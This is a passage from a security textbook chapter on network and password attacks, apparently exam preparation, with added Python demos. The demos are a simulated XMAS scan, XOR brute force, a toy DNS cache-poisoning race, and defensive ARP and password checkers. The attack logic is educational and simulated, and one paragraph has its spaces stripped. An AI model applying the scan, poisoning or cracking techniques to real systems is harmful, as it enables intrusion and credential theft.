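        claims = json.loads(body)
        if not claims["iat"] <= now <= claims["iat"] + self.ttl:
            return False, "expired"
        self.seen = {n: exp for n, exp in self.seen.items() if exp >= now}   # prune old nonces
        if claims["nonce"] in self.seen:
            return False, "replayed"
        self.seen[claims["nonce"]] = claims["iat"] + self.ttl
        return True, "ok"


if __name__ == "__main__":
    svc = TicketService(key=b"demo-key-not-secret-0123456789ab", ttl_seconds=30)
    ticket = svc.issue("alice", 100, now=1000)
    print(svc.redeem(ticket, now=1005))     # first use: accepted
    print(svc.redeem(ticket, now=1010))     # captured and replayed inside the window
    print(svc.redeem(ticket, now=2000))     # replayed after the window
```

Only nonces that are still inside their window need to be remembered, which keeps the replay table bounded by the validity period rather than by the lifetime of the service.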
Transitive Access
Transitive access is a means of attacking a system by violating the trust relationship between machines. A simple example is when servers are well protected and clients are not, and the servers trust the clients. In this case, attacking a client can provide transitive access to the servers.
Exam Tip: Trust is an essential part of security. If B trusts A and C trusts B, then C trusts A. A transitive attack takes advantage of this trust chain by obtaining trust from one element in the chain (for example, through spoofing) and then using that to gain transitive access to another trusted system via the chain of trust.
Spam
Though not generally considered a social engineering issue, nor a security issue for that matter, spam can, however, be a security concern. Spam, as just about everybody knows, is bulk unsolicited e-mail. It can be legitimate in the sense that it has been sent by a company advertising a product or service, but it can also be malicious and could include an attachment that contains malicious software designed to harm your system, or a link to a malicious web site that may attempt to obtain personal information from you.
Spim
Though not as well known, a variation on spam is spim, which is basically spam delivered via an instant messaging application such as Yahoo! Messenger or AOL Instant Messenger (AIM). The purpose of hostile spim is the same as that of spam: the delivery of malicious content or links.
Phishing
Phishing is the use of fraudulent e-mails or instant messages that appear to be genuine but are designed to trick users. The goal of a phishing attack is to obtain from the user information that can be used in an attack, such as login credentials or other critical information.
The Anti-Phishing Working Group (APWG) is "an industry association focused on eliminating the identity theft and fraud that result from the growing problem of phishing and email spoofing." APWG is located at www.antiphishing.org.
Spear Phishing
Spear phishing is the term that has been created to refer to a phishing attack that targets a specific group with something in common. By targeting a specific group, the ratio of successful attacks (that is, the number of responses received) to the total number of e-mails or messages sent usually increases because a targeted attack will seem more plausible than a message sent to users randomly.
Vishing
Vishing is a variation of phishing that uses voice communication technology to obtain the information the attacker is seeking. Vishing takes advantage of the trust that some people place in the telephone network. Users are unaware that attackers can spoof (simulate) calls from legitimate entities using voice over IP (VoIP) technology. Voice messaging can also be compromised and used in these attempts. Generally, the attackers are hoping to obtain credit card numbers or other information that can be used in identity theft. The user may receive an e-mail asking him or her to call a number that is answered by a potentially compromised voice message system. Users may also receive a recorded message that appears to come from a legitimate entity. In both cases, the user will be encouraged to respond quickly and provide the sensitive information so that access to their account is not blocked. If a user ever receives a message that claims to be from a reputable entity and asks for sensitive information, the user should not provide it but instead should use the Internet or examine a legitimate account statement to find a phone number that can be used to contact the entity. The user can then verify that the message received was legitimate or report the vishing attempt.
Pharming
Pharming consists of misdirecting users to fake web sites that have been made to look official. Using phishing, individuals are targeted one by one by e-mails. To become a victim, the recipient must take an action (for example, respond by providing personal information). In pharming, the user will be directed to the fake web site as a result of activity such as DNS poisoning (an attack that changes the name-to-address records a DNS server hands out) or modification of local hosts files, which are consulted before DNS to convert host names to the appropriate IP addresses. Once at the fake web site, the user may supply personal information, believing that they are connected to the legitimate site. Figure 15.9 illustrates how pharming operates. The first step is an attacker poisons the DNS system, so when the user queries it (step 2) they get a false address (step 3). This results in the user being directed to the fake web site (step 4).
• Figure 15.9 How pharming works
Scanning Attacks
Scanners can be used to send specifically crafted packets in an attempt to determine TCP/UDP port status. An XMAS scan, named because the set flag bits in the TCP header look like the lights on a Christmas tree, uses the URG, PSH, and FIN flags to determine TCP port availability. If the port is closed, an RST is returned. If the port is open, there is typically no return; because a dropped probe looks the same as one eaten by a firewall, scanners such as Nmap report such a port as open|filtered. An XMAS scan can help determine OS type and version, based upon TCP/IP stack responses, and can also help determine firewall rules. These attacks can also be used to consume system resources, resulting in DoS.
Tech Tip
XMAS Attack
The XMAS attack or Christmas attack comes from a specific set of protocol options. A Christmas tree packet is a packet that has all of its options turned on. The name comes from the observation that these packets are lit up like a Christmas tree. When sent as a scan, a Christmas tree packet has the FIN, URG, and PSH options set. RFC 793, which governs TCP, says that a closed port answers with RST and that an open port silently drops a segment carrying none of SYN, RST, or ACK; many OSs implement this (and the other corner cases of the specification) in slightly different manners, and some send RST regardless of port state. Their response to the packet can tell the scanner what type of OS is present. Another option is in the case of a DoS attack, where Christmas packets can take up significantly greater processing on a router, consuming resources.
Simple stateless firewalls check for the SYN flag set to block unwanted connection attempts and SYN floods, and Christmas packets are designed not to have SYN set, so they pass right by these devices. Newer security devices such as advanced firewalls and intrusion detection systems can detect these packets, alerting people to the scanning activities.
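The added example below (not code from the book) builds the XMAS probe from a raw TCP header and runs it against two simulated targets, an RFC 793-conformant stack and one that answers every port with RST, which is the behaviour difference the Tech Tip says fingerprints the operating system; it then shows a SYN-only stateless rule letting the probe through and the flag check a smarter device uses to flag it. The port sets and port numbers are constructed for the demo.

```python
# Added example (not from the book): an XMAS probe built from a raw TCP header,
# two models of how a target answers it (an RFC 793-conformant stack, and a
# stack that sends RST for every port), a SYN-only stateless filter that lets
# the probe through, and the flag check a smarter device uses to flag it.
import struct

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
TCP_HDR = "!HHIIHHHH"   # src port, dst port, seq, ack, data offset+flags, window, checksum, urgent ptr


def build_tcp(src_port: int, dst_port: int, flags: int, seq: int = 0, ack: int = 0) -> bytes:
    return struct.pack(TCP_HDR, src_port, dst_port, seq, ack, (5 << 12) | flags, 8192, 0, 0)


def tcp_flags(segment: bytes) -> int:
    return struct.unpack("!H", segment[12:14])[0] & 0x3F


def xmas_probe(src_port: int, dst_port: int) -> bytes:
    """FIN, PSH and URG lit; no SYN, so it is not a connection attempt."""
    return build_tcp(src_port, dst_port, FIN | PSH | URG)


def rfc793_target(open_ports: set):
    """RFC 793: a closed port answers any non-RST segment with RST; an open port
    silently drops a segment that carries none of SYN, RST or ACK."""
    def respond(segment):
        src, dst = struct.unpack("!HH", segment[:4])
        flags = tcp_flags(segment)
        if flags & RST:
            return None
        if dst not in open_ports:
            return build_tcp(dst, src, RST | ACK)
        if flags & SYN:
            return build_tcp(dst, src, SYN | ACK)
        return None
    return respond


def rst_for_everything_target(open_ports: set):
    """Stacks that send RST to an XMAS probe regardless of port state, which is
    why the scan reports every port closed and thereby fingerprints the OS."""
    def respond(segment):
        src, dst = struct.unpack("!HH", segment[:4])
        flags = tcp_flags(segment)
        if flags & SYN and dst in open_ports:
            return build_tcp(dst, src, SYN | ACK)
        return None if flags & RST else build_tcp(dst, src, RST | ACK)
    return respond


def xmas_scan(target, ports) -> dict:
    """Silence is ambiguous: the port may be open or a filter ate the probe."""
    return {p: "closed" if target(xmas_probe(40000, p)) else "open|filtered" for p in ports}


def syn_only_filter_drops(segment: bytes) -> bool:
    """Stateless rule 'block new inbound connections': drop SYN without ACK."""
    flags = tcp_flags(segment)
    return bool(flags & SYN) and not flags & ACK


def looks_like_xmas(segment: bytes) -> bool:
    """What an IDS signature checks: all three lights on, none of SYN/ACK/RST."""
    flags = tcp_flags(segment)
    return (flags & (FIN | PSH | URG)) == (FIN | PSH | URG) and not flags & (SYN | ACK | RST)


if __name__ == "__main__":
    print("RFC 793 host:", xmas_scan(rfc793_target({22, 80}), [22, 25, 80]))
    print("RST-for-everything host:", xmas_scan(rst_for_everything_target({22, 80}), [22, 25, 80]))
    probe = xmas_probe(40000, 80)
    print("SYN-only filter drops probe:", syn_only_filter_drops(probe), "| IDS flags it:", looks_like_xmas(probe))
```

A stateful firewall would drop the probe for a different reason: it belongs to no connection the firewall has seen a handshake for.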
Attacks on Encryption
Encryption is the process of transforming plaintext into an unreadable format known as ciphertext using a specific technique or algorithm. Most encryption techniques use some form of key in the encryption process. The key is used in a mathematical process to scramble the original message to arrive at the unreadable ciphertext. Another key (sometimes the same one and sometimes a different one) is used to decrypt or unscramble the ciphertext to re-create the original plaintext. The length of the key often directly relates to the strength of the encryption.
Cryptanalysis is the process of attempting to break a cryptographic system; it is an attack on the specific method used to encrypt the plaintext. Cryptographic systems can be compromised in various ways.
Weak Keys
Certain encryption algorithms may have specific keys that yield poor, or easily decrypted, ciphertext. Imagine an encryption algorithm that consists solely of a single XOR function (an exclusive OR function where two bits are compared and a 1 is returned if either of the original bits, but not both, is a 1), where the key is repeatedly used to XOR with the plaintext. A key where all bits are 0s, for example, would result in ciphertext that is the same as the original plaintext. This would obviously be a weak key for this encryption algorithm. In fact, any key with long strings of 0s would yield portions of the ciphertext that were the same as the plaintext. In this simple example, many keys could be considered weak. Encryption algorithms used in computer systems and networks are much more complicated than a simple, single XOR function, but some algorithms have still been found to have weak keys that make cryptanalysis easier.
Cross Check
Cryptography and Encryption
Understanding the basics of cryptography is important to understanding various defenses from malware. If you are not familiar with encryption, decryption, hashes, and signatures, it would be wise to review them now. The various elements of cryptography and encryption are discussed in detail in Chapter 5.
Exhaustive Search of Key Space
Even if the specific algorithm used to encrypt a message is complicated and has not been shown to have weak keys, the key length will still play a significant role in how easy it is to attack the method of encryption. Generally speaking, the longer a key, the harder it will be to attack. Thus, a 40-bit encryption scheme will be easier to attack using a brute-force technique (which tests all possible keys, one by one) than a 256-bit based scheme. This is easily demonstrated by imagining a scheme that employs a 2-bit key. Even if the resulting ciphertext were completely unreadable, performing a brute-force attack until one key is found that can decrypt the ciphertext would not take long, since only four keys are possible. Every bit that is added to the length of a key doubles the number of keys that have to be tested in a brute-force attack on the encryption. It is easy to understand why a scheme utilizing a 40-bit key would be much easier to attack than a scheme that utilizes a 256-bit key. The bottom line is simple: an exhaustive search of the key space will decrypt the message. The strength of the encryption method is related to the sheer size of the key space, which with modern algorithms is large enough to provide significant time constraints when using this method to break an encrypted message. Algorithmic complexity is also an issue with respect to brute force, and you cannot immediately compare different key lengths from different algorithms and assume relative strength.
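The following added example (not from the book) makes the two preceding sections concrete: it implements the single-XOR cipher used to explain weak keys, a check that identifies the keys that leak plaintext, and a brute-force search with a known-plaintext crib whose count of attempts grows exactly as the key-length argument says. The plaintext, keys, crib and the trial rate fed to the timing estimate are constructed for the demo.

```python
# Added example (not from the book): the single-XOR cipher the text uses to
# explain weak keys, a check that spots the keys that leak plaintext, and a
# brute-force search that shows why every extra key bit doubles the work.
# Plaintext, keys and the speed figure are constructed for the demo.
def xor_cipher(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def leaked_positions(plaintext: bytes, key: bytes) -> list:
    """Offsets where ciphertext equals plaintext: every position the key's
    zero bytes line up with. An all-zero key leaks everything."""
    ct = xor_cipher(plaintext, key)
    return [i for i, (p, c) in enumerate(zip(plaintext, ct)) if p == c]


def is_weak_key(key: bytes) -> bool:
    """Weak for this cipher: any zero byte (passes plaintext through) or a key
    made of one repeated byte (then it is really a single-byte key)."""
    return 0 in key or len(set(key)) == 1


def brute_force(ciphertext: bytes, key_bits: int, crib: bytes) -> tuple:
    """Try every key of key_bits bits (rounded up to whole bytes) until the
    decrypted prefix matches a known plaintext crib.
    Returns (key, keys_tried) or (None, 2**key_bits)."""
    width = (key_bits + 7) // 8
    for n in range(2 ** key_bits):
        key = n.to_bytes(width, "big")
        if xor_cipher(ciphertext[:len(crib)], key) == crib:
            return key, n + 1
    return None, 2 ** key_bits


def keyspace(bits: int) -> int:
    return 2 ** bits


def years_to_exhaust(bits: int, keys_per_second: float) -> float:
    """Worst-case time for an exhaustive search at a given trial rate."""
    return keyspace(bits) / keys_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    msg = b"ATTACK AT DAWN"
    print("all-zero key leaks offsets:", leaked_positions(msg, b"\x00\x00\x00\x00"))
    print("key 00 5a leaks offsets:", leaked_positions(msg, b"\x00\x5a"), "weak:", is_weak_key(b"\x00\x5a"))
    ct = xor_cipher(msg, b"\x9c\x31")
    print("16-bit brute force (key, tries):", brute_force(ct, 16, crib=b"ATTACK"))
    print("41-bit space is twice 40-bit:", keyspace(41) == 2 * keyspace(40))
    print("years at 1e9 keys/s, 40-bit:", years_to_exhaust(40, 1e9), "256-bit:", years_to_exhaust(256, 1e9))
```

The crib is what makes the search terminate: without some way to recognize the right plaintext, an exhaustive search produces every possible decryption and cannot tell which one is real.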
Indirect Attacks
One of the most common ways of attacking an encryption system is to find weaknesses in mechanisms surrounding the cryptography. Examples include poor random-number generators, unprotected key exchanges, keys stored on hard drives without sufficient protection, and other general programmatic errors, such as buffer overflows. In attacks that target these types of weaknesses, it is not the cryptographic algorithm itself that is being attacked, but rather the implementation of that algorithm in the real world.
Address System Attacks
Many aspects of a computer system are controlled by the use of addresses. IP addresses can be manipulated as shown earlier, and the other address schemes can be manipulated as well. In the summer of 2008, much was made of a serious Domain Name System (DNS) vulnerability that required the simultaneous patching of systems by over 80 vendors. This coordinated effort was to close a technical loophole in the domain name resolution infrastructure that would allow the hijacking of, and man-in-the-middle attacks on, the DNS system worldwide.
Exam Tip: The process of using a new domain name for the five-day "test" period and then relinquishing the name, only to repeat the process again, in essence obtaining a domain name for free, is called DNS kiting.
The DNS system has been the target of other attacks. One attack, DNS kiting, is an economic attack against the terms of using a new DNS entry. New DNS purchases are allowed a five-day "test period" (the add grace period, whose abuse is also known as domain tasting) during which the name can be relinquished for no fee. Creative users learned to register a name, use it for less than five days, relinquish the name, and then get the name and begin all over, repeating this cycle many times to use a name without paying for it. Typical registration versus permanent entry ratios of 15:1 occur, and in February 2007 GoDaddy reported that out of 55.1 million requests only 3.6 million were not canceled. Another twist on this scheme is the concept of domain name front running, where a registrar places a name on a five-day hold after someone searches for it, and then offers it for sale at a higher price. In January 2008, Network Solutions was accused of violating the trust as a registrar by forcing people to purchase names from them after they engaged in domain name testing.
Cache Poisoning
Many network activities rely upon various addressing schemes to function properly. When you point your web browser at your bank, by typing the bank's URL, your browser consults the system's DNS resolver to turn the words into a numerical address. When a packet is being switched to your machine by the network, a series of address caches is involved. Whether the cache is for the DNS system or the ARP system, it exists for the same reason: efficiency. These caches prevent repeated redundant lookups, saving time for the system. But they can also be poisoned, sending incorrect information to the end user's application, redirecting traffic, and changing system behaviors.
Exam Tip: Understanding how hijacking attacks are performed through poisoning the addressing mechanisms is important for the exam.
DNS Poisoning
The DNS system is used to convert a name into an IP address. There is not a single DNS system, but rather a hierarchy of DNS servers, from root servers on the backbone of the Internet, to recursive resolvers at your ISP, your home router, and your local machine, each keeping its own DNS cache. To examine a DNS query for a specific address, you can use the nslookup command. Figure 15.10 shows a series of DNS queries executed on a Windows machine. In the first request, the DNS server was with an ISP, while on the second request, the DNS server was reached over a VPN connection. Between the two requests, the network connections were changed, so a different resolver answered and the lookups differed. Two resolvers disagreeing about the same name is exactly the symptom a DNS poisoning attack produces, which is why comparing an answer against an independent resolver is a quick sanity check when poisoning is suspected.
• Figure 15.10 nslookup of a DNS query
At times, nslookup will return a non-authoritative answer, as shown in Figure 15.11. This means the result came from a resolver's cache, as opposed to from a server that is authoritative for the zone (that is, one that holds the definitive records for the name).
• Figure 15.11 Cache response to a DNS query
There are other commands you can use to examine and manipulate the DNS cache on a system. In Windows, the ipconfig /displaydns command will show the current DNS cache on a machine. Figure 15.12 shows a small DNS cache. This cache was recently emptied using the ipconfig /flushdns command to make it fit on the screen.
• Figure 15.12 Cache response to a DNS table query
Looking at DNS as a complete system shows that there are hierarchical levels from the top (root server) down to the cache in an individual machine. DNS poisoning can occur at any of these levels, with the effect of the poisoning growing wider the higher up it occurs. In 2010, a root-server mirror hosted inside China handed out the falsified answers used by the "Great Firewall of China" to queries arriving from outside the country, so that users in the United States and elsewhere were censored in the same way until the bad entries were flushed from the affected caches. On further examination the event proved to be considerably more complex than a simple poisoning. The Chinese government actively seeks to strictly control all aspects of Internet traffic in China.
DNS poisoning is a variant of a larger attack class referred to as DNS spoofing, in which an attacker changes a DNS record through any of a multitude of means. There are many ways to perform DNS spoofing, a few of which include compromising a DNS server, the use of the Kaminsky attack, and the use of a false network node advertising a false DNS address. An attacker can even use DNS cache poisoning to result in DNS spoofing. By poisoning an upstream DNS cache, all of the downstream users will get spoofed DNS records.
Because of the importance of integrity on DNS requests and responses, a project has been under way to secure the DNS infrastructure using digital signing of DNS records. This effort, the Domain Name System Security Extensions (DNSSEC), was standardized through the IETF and pushed into deployment with strong U.S. government backing (the root zone was signed in 2010). DNSSEC works by adding records to the DNS system: a zone's public key (DNSKEY), signatures over each set of records (RRSIG), and a record in the parent zone (DS) attesting to the validity of the child's key, so that trust chains down from the root. With this information, requestors can be assured that the information they receive is what the zone owner published. It is taking a substantial amount of time (years) for this system to propagate through the entire DNS infrastructure, but in the end, the system will have much greater assurance.
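The following added example (not code from the book) simulates the cache-poisoning race described in this section against a toy resolver. The resolver accepts the first answer whose transaction ID and destination port match the outstanding query, which is all that classic resolvers checked; with a sequential transaction ID and a fixed port, an attacker who can observe one lookup (for a name under a domain he controls, the setup the Kaminsky attack relies on) predicts the next ID and wins the race, while random IDs and a random source port, the 2008 fix, defeat the forged answer. A bailiwick check additionally refuses extra records for names outside the zone that was asked about. The names, addresses, the sequential-ID starting value and the RNG seed are constructed for the demo.

```python
# Added example (not from the book): a toy stub resolver and the cache-poisoning
# race against it. Names, addresses and the RNG seed are constructed for the demo.
import random
from dataclasses import dataclass


@dataclass
class Query:
    name: str
    txid: int
    sport: int


@dataclass
class Response:
    name: str
    txid: int
    dport: int
    records: dict          # name -> IPv4 address; may carry "additional" records


def zone_of(name: str) -> str:
    return name.split(".", 1)[1]


class Resolver:
    def __init__(self, predictable_txid: bool, random_port: bool, rng: random.Random):
        self.predictable_txid, self.random_port, self.rng = predictable_txid, random_port, rng
        self.next_txid, self.pending, self.cache = 0x1000, {}, {}

    def send_query(self, name: str) -> Query:
        if self.predictable_txid:
            txid, self.next_txid = self.next_txid, (self.next_txid + 1) & 0xFFFF
        else:
            txid = self.rng.randrange(0x10000)
        sport = self.rng.randrange(1024, 65536) if self.random_port else 53
        self.pending[name] = Query(name, txid, sport)
        return self.pending[name]

    def receive(self, resp: Response) -> bool:
        """Accept a response only if it matches an outstanding query; cache only
        records inside the bailiwick of the name that was asked about."""
        q = self.pending.get(resp.name)
        if q is None or (q.txid, q.sport) != (resp.txid, resp.dport):
            return False
        zone = zone_of(resp.name)
        for rec, ip in resp.records.items():
            if rec == resp.name or rec.endswith("." + zone):
                self.cache[rec] = ip
        del self.pending[resp.name]
        return True


def poisoning_race(resolver: Resolver, victim: str, attacker_ip: str) -> str:
    """Attacker owns attacker.example, so he sees the resolver's query for a
    name under it (transaction ID and port). He then triggers a lookup of the
    victim name and fires a forged answer for the ID he expects next, before
    the genuine answer arrives."""
    probe = resolver.send_query("probe.attacker.example")
    resolver.receive(Response(probe.name, probe.txid, probe.sport, {probe.name: attacker_ip}))
    q = resolver.send_query(victim)                # the attacker never sees this one
    forged = Response(victim, (probe.txid + 1) & 0xFFFF, probe.sport,
                      {victim: attacker_ip, "www.otherbank.example": attacker_ip})
    resolver.receive(forged)
    resolver.receive(Response(victim, q.txid, q.sport, {victim: "192.0.2.80"}))  # genuine, arrives later
    return resolver.cache.get(victim)


if __name__ == "__main__":
    weak = Resolver(predictable_txid=True, random_port=False, rng=random.Random(7))
    hardened = Resolver(predictable_txid=False, random_port=True, rng=random.Random(7))
    print("weak resolver answers:", poisoning_race(weak, "www.bank.example", "198.51.100.66"))
    print("hardened resolver answers:", poisoning_race(hardened, "www.bank.example", "198.51.100.66"))
    print("out-of-bailiwick record cached:", "www.otherbank.example" in weak.cache)
```

Port randomization only lengthens the attacker's odds (about 2^32 guesses instead of 2^16); DNSSEC closes the hole outright, because a forged record set carries no valid RRSIG.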
ARP Poisoning
In moving packets between machines, a device sometimes needs to know where to send a packet using the MAC or Layer 2 address. Address Resolution Protocol (ARP) handles this problem through four basic message types:
ARP request: "Who has this IP address?"
ARP reply: "I have that IP address; my MAC address is ..."
Reverse ARP (RARP) request: "What IP address belongs to this MAC address?"
RARP reply: "That MAC address maps to IP address ..."
These messages are used in conjunction with a device's ARP table, a form of short-term memory where these address pairs reside. The messages are used as a simple form of lookup. When a machine sends an ARP request to the network, the reply is received and entered into the tables of all devices that hear the reply. This facilitates efficient address lookups, but also makes the system subject to attack. When the ARP table gets a reply, it automatically trusts the reply and updates the table. Some operating systems will even accept ARP reply data if they never heard the original request (a so-called gratuitous ARP). There is no mechanism to verify the veracity of the data received. An attacker can send forged replies, corrupt the ARP table, and cause packets to be misrouted. This form of attack is called ARP poisoning and results in malicious address redirection. It provides a mechanism whereby an attacker can inject themselves into the middle of a conversation between two machines, a man-in-the-middle attack.
ExamTip:ARPpoisoningisthealteringoftheARPcacheonthelocalsystem.
LocalMACaddressescanalsobepoisonedinthesamemanner,althoughitiscalledARPpoisoning.Thiscancausemiscommunicationslocally.Poisoningattackscanbeusedtostealinformation,establishman-in-the-middleattacks,andevencreateDoSopportunities.
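Because an ARP cache trusts every reply it hears, detection is the practical defense. The following Python is an added example, not code from the book: an arpwatch-style monitor run over a constructed ARP trace that flags the symptoms the text describes, a reply that nobody requested, an IP whose MAC suddenly changes, and a single MAC claiming several IPs. The addresses and the (op, sender_ip, sender_mac, target_ip) tuple format are assumptions made for the example.

```python
"""ARP monitor that flags the symptoms of ARP cache poisoning (constructed example)."""
from collections import defaultdict

# Constructed ARP trace: (op, sender_ip, sender_mac, target_ip).
SAMPLE_ARP = [
    ("request", "192.168.1.20", "00:11:22:33:44:20", "192.168.1.1"),
    ("reply",   "192.168.1.1",  "00:11:22:33:44:01", "192.168.1.20"),  # gateway answers
    ("reply",   "192.168.1.1",  "de:ad:be:ef:00:01", "192.168.1.20"),  # unsolicited, different MAC
    ("reply",   "192.168.1.20", "de:ad:be:ef:00:01", "192.168.1.1"),   # same MAC now claims the victim
]


def analyze_arp(packets, max_ips_per_mac=1):
    """Return a list of (alert, subject, detail) tuples for a sequence of ARP packets.

    max_ips_per_mac is a policy knob: routers and multi-homed hosts legitimately
    hold several addresses, so raise it where that is expected.
    """
    table = {}                       # ip -> mac, the mapping we last saw claimed
    outstanding = set()              # (requester_ip, asked_ip) requests not yet answered
    mac_to_ips = defaultdict(set)
    alerts = []
    for op, sender_ip, sender_mac, target_ip in packets:
        if op == "request":
            outstanding.add((sender_ip, target_ip))
            continue
        # A reply says "sender_ip is at sender_mac" and is addressed to target_ip.
        if (target_ip, sender_ip) in outstanding:
            outstanding.discard((target_ip, sender_ip))
        else:
            alerts.append(("unsolicited_reply", sender_ip, sender_mac))
        previous = table.get(sender_ip)
        if previous and previous != sender_mac:
            alerts.append(("mac_changed", sender_ip, f"{previous}->{sender_mac}"))
        table[sender_ip] = sender_mac
        mac_to_ips[sender_mac].add(sender_ip)
        if len(mac_to_ips[sender_mac]) > max_ips_per_mac:
            alerts.append(("mac_claims_multiple_ips", sender_mac, sorted(mac_to_ips[sender_mac])))
    return alerts
```

The first two packets (a request and its matching reply) produce no alerts; the two unsolicited replies that follow produce the three kinds of alert in sequence.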
Password Guessing

The most common form of authentication is the user ID and password combination. While it is not inherently a poor mechanism for authentication, the combination can be attacked in several ways. All too often, these attacks yield favorable results for the attacker not as a result of a weakness in the scheme but usually due to the user not following good password procedures.

Poor Password Choices

The least technical of the various password-attack techniques consists of the attacker simply attempting to guess the password of an authorized user of the system or network. It is surprising how often this simple method works, and the reason it does is because people are notorious for picking poor passwords. Users need to select a password that they can remember, so they create simple passwords, such as their birthday, their mother’s maiden name, the name of their spouse or one of their children, or even simply their user ID itself. All it takes is for the attacker to obtain a valid user ID (often a simple matter, because organizations tend to use an individual’s names in some combination—first letter of their first name combined with their last name, for example) and a little bit of information about the user before guessing can begin.

Dictionary Attack

Another method of determining passwords is to use a password-cracking program that uses a list of dictionary words to try to guess the password. The dictionary words can be used by themselves, or two or more smaller words can be combined to form a single possible password. A number of commercial and public-domain password-cracking programs employ a variety of methods to crack passwords, including using variations on the user ID. Rules can also be defined so that the cracking program will substitute special characters for other characters or combine words. The ability of the attacker to crack passwords is directly related to the method the user employs to create the password in the first place, as well as the dictionary and rules used.

Brute-Force Attack

If the user has selected a password that is not found in a dictionary, even if simply by substituting various numbers or special characters for letters, the only way the password can be cracked is for an attacker to attempt a brute-force attack, in which the password-cracking program attempts all possible character combinations. The length of the password and the size of the set of possible characters in the password will greatly affect the time a brute-force attack will take. A few years ago, this method of attack was very time consuming, since it took considerable time to generate all possible combinations. With the increase in computer speed, however, generating password combinations is much faster, making it more feasible to launch brute-force attacks against certain computer systems and networks.

Modern multicore processors and large on-chip cache memories have significantly improved the speed of password-cracking programs, making brute-force methods practical in many cases.

A brute-force attack on a password can take place at two levels: The attacker can use a password-cracking program to attempt to guess the password directly at a login prompt, or the attacker can first steal a password file, use a password-cracking program to compile a list of possible passwords based on the list of password hashes contained in the password file (offline), and then use that narrower list to attempt to guess the password at the login prompt. The first attack can be made more difficult if the account locks after a few failed login attempts. The second attack can be thwarted if the password file is securely maintained so that others cannot obtain a copy of it.
Tech Tip

Offline Password Attacks

Because an attacker who obtains a password file has unlimited time offline to prepare for the online attack, and can prepare without tipping off the target, all passwords should be considered to be vulnerable over extended periods of time. For this reason, even batch passwords (used for system-run batch jobs) should be changed periodically to prevent offline attacks.
Hybrid Attack

A hybrid password attack is an attack that combines the preceding dictionary and brute-force methods. Most cracking tools have this option built in, first attempting a dictionary attack, and then moving to brute-force methods. The programs often permit the attacker to create various rules that tell the program how to combine words to form new possible passwords. Users commonly substitute certain numbers for specific letters. If the user wanted to use the word secret as a base for a password, for example, she could replace the letter e with the number 3, yielding s3cr3t. This password will not be found in the dictionary, so a pure dictionary attack would not crack it, but the password is still easy for the user to remember. If the attacker created a rule that instructed the program to try all words in the dictionary and then try the same words substituting the number 3 for the letter e, however, the password would be cracked.

Birthday Attack

The birthday attack is a special type of brute-force attack that gets its name from something known as the birthday paradox, which states that in a group of at least 23 people, the chance that two individuals will have the same birthday is greater than 50 percent. Mathematically, the equation is 1.25 × k^(1/2), where k equals the size of the set of possible values, which in the birthday paradox is 365 (the number of possible birthdays). This same phenomenon applies to passwords, with k (number of passwords) being quite a bit larger.
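The dictionary, brute-force, hybrid and birthday passages above describe how a cracker reasons; a defender can apply the same reasoning at the moment a password is chosen. The following Python is an added example, not code from the book. It undoes the common number-for-letter substitutions a hybrid rule would try (so s3cr3t is treated as secret), checks for two dictionary words glued together, estimates worst-case brute-force time from the password’s length and character set, and computes the 1.25 × k^(1/2) birthday bound from the text. The five-word dictionary and the assumed guessing rate of 10^10 per second are constructed values; a real deployment would load a full cracking wordlist and calibrate the rate to its threat model.

```python
"""Defender-side password assessment mirroring the attack classes above (constructed example)."""
import math
import string

# Constructed mini wordlist; a real check would load a large cracking dictionary.
DICTIONARY = {"secret", "password", "welcome", "summer", "dragon"}

# The substitutions a hybrid cracking rule tries first; we reverse them before lookup.
LEET = str.maketrans({"3": "e", "0": "o", "1": "i", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"})


def normalize(password):
    """Strip trailing digits/symbols and undo leet substitutions: 's3cr3t!' -> 'secret'."""
    return password.lower().rstrip(string.digits + string.punctuation).translate(LEET)


def in_dictionary(password, user_id=""):
    """True if a dictionary or hybrid rule would reach this password quickly."""
    base = normalize(password)
    if base in DICTIONARY or (user_id and base == user_id.lower()):
        return True
    # Two smaller words combined, e.g. "summerdragon".
    return any(base.startswith(w) and base[len(w):] in DICTIONARY for w in DICTIONARY)


def charset_size(password):
    """Size of the smallest standard character class set that contains the password."""
    size = 0
    if any(c.islower() for c in password):
        size += 26
    if any(c.isupper() for c in password):
        size += 26
    if any(c.isdigit() for c in password):
        size += 10
    if any(c in string.punctuation for c in password):
        size += len(string.punctuation)  # 32 printable ASCII symbols
    return size


def brute_force_seconds(password, guesses_per_second=1e10):
    """Worst-case time to enumerate every password of this length over this charset."""
    return charset_size(password) ** len(password) / guesses_per_second


def birthday_bound(k):
    """Samples needed before a collision is more likely than not: 1.25 * sqrt(k)."""
    return 1.25 * math.sqrt(k)


def assess(password, user_id=""):
    if in_dictionary(password, user_id):
        return "reject: dictionary or hybrid-rule guessable"
    if brute_force_seconds(password) < 365 * 86400:
        return "reject: brute-forceable within a year at 1e10 guesses/s"
    return "accept"
```

For k = 365 the bound comes out just under 24, matching the 23-person figure in the text; for a password space the same formula tells you how many hashes an attacker must compare before a collision becomes likely.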
Pass-the-Hash Attacks

Pass the hash is a hacking technique where the attacker captures the hash used to authenticate a process. They can then use this hash, by injecting it into a process in place of the password. This is a highly technical attack, targeting the Windows authentication process, injecting a copy of the password hash directly into the system. The attacker does not need to know the password, but instead can use a captured hash and inject it directly, which will verify correctly, granting access. As this is a very technically specific hack, tools have been developed to facilitate its operation.

Tech Tip

Mimikatz

Mimikatz is a toolset that can provide insight and exploration into Windows security elements, including obtaining Kerberos credentials and creating a “golden ticket,” a universal Kerberos ticket. Mimikatz has been included in Metasploit, making this an awesome post-exploitation tool that can enable tremendous attacker functionality on a Windows machine.
Software Exploitation

